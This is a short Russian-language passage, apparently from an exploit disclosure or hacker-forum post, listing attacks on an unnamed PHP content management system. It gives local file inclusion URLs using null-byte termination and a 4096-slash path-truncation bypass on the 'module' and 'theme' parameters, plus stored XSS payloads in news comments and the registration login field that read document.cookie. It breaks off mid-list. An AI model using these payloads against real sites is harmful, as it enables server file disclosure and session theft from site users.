www.site.com/index.php?module={INC}%00
и www.site.com/index.php?module=not_exist_module&theme={INC}%00
Для второго случая наличие magic_quotes_gpc=off не обязательно, обходим известным способом со слешами www.site.com/index.php?module=not_exist_module&theme={INC} {/ x 4096}
2) XSS
XSS в коментарии к новосятм
Файл: /modules/news/index.php
XSS при регистрации. Указываем в логине <script>alert(document.cookie)</script>
Файлы подверженые уязвимости: